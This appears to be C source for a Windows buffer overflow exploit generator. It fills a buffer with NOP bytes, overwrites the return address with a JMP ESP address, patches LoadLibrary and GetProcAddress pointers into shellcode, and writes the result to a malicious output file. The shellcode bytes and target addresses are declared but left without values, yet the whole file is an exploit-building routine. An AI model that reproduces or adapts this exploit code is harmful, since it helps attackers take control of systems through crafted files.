
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 unsigned int FAKE_ADR ;
 int FALSE ;
 scalar_t__ GetProcAddress ;
 size_t* GetProcAddress_fcp ;
 char* HEAD ;
 unsigned int JMPESP_ADR ;
 scalar_t__ LoadLibrary ;
 int MAXBUF ;
 size_t RETADR ;
 int exit (int) ;
 char* exploit_code ;
 char* exploit_data ;
 int fclose (int *) ;
 char* filename ;
 int * fopen (char*,char*) ;
 int fwrite (unsigned char*,int,int,int *) ;
 int memcpy (unsigned char*,char*,int) ;
 int memset (unsigned char*,int,int) ;
 int printf (char*,...) ;
 int strcat (char*,char*) ;
 char* string_buffer ;
 int strlen (char*) ;

main(int argc,char *argv[])
{
    unsigned char buf[MAXBUF],l1,l2;
    unsigned int ip,p1,p2,i;
    FILE *fp;

    if (argc<2){
        printf("usage : %s outputfile\n",argv[0]);
        exit(1);
    }
    memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
    memcpy(buf,HEAD,4);

    ip=JMPESP_ADR;
    buf[RETADR ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    buf[RETADR+6]=0xeb;
    buf[RETADR+7]=0x04;

    ip=FAKE_ADR;
    buf[RETADR+8]=ip&0xff;
    buf[RETADR+9]=(ip>>8)&0xff;
    buf[RETADR+10]=(ip>>16)&0xff;
    buf[RETADR+11]=(ip>>24)&0xff;

    p1=(unsigned int)LoadLibrary;
    p2=(unsigned int)GetProcAddress;
    exploit_code[0x1f]=p1&0xff;
    exploit_code[0x20]=(p1>>8)&0xff;
    exploit_code[0x21]=(p1>>16)&0xff;
    exploit_code[0x22]=(p1>>24)&0xff;

    for (i=0;i<4;i++){
        exploit_code[GetProcAddress_fcp[i] ]=p2&0xff;
        exploit_code[GetProcAddress_fcp[i]+1]=(p2>>8)&0xff;
        exploit_code[GetProcAddress_fcp[i]+2]=(p2>>16)&0xff;
        exploit_code[GetProcAddress_fcp[i]+3]=(p2>>24)&0xff;
    }

    l1=strlen(filename)+strlen(string_buffer);
    l2=strlen(exploit_data);
    strcat(string_buffer,filename );
    strcat(string_buffer,"_" );
    strcat(string_buffer,exploit_data );
    strcat(exploit_code, string_buffer );
    exploit_code[0x1c] = l1;
    exploit_code[0x6d] = l2;
    exploit_code[0x77] = l1+1;

    memcpy(buf+RETADR+12,exploit_code,strlen(exploit_code));

    if ((fp=fopen(argv[1],"wb"))==((void*)0)){
        printf("Can not write file '%s'\n",argv[1]);
        exit(1);
    }

    fwrite(buf,1,MAXBUF,fp);
    fclose(fp);
    printf("Done.\n");
    return FALSE;
}
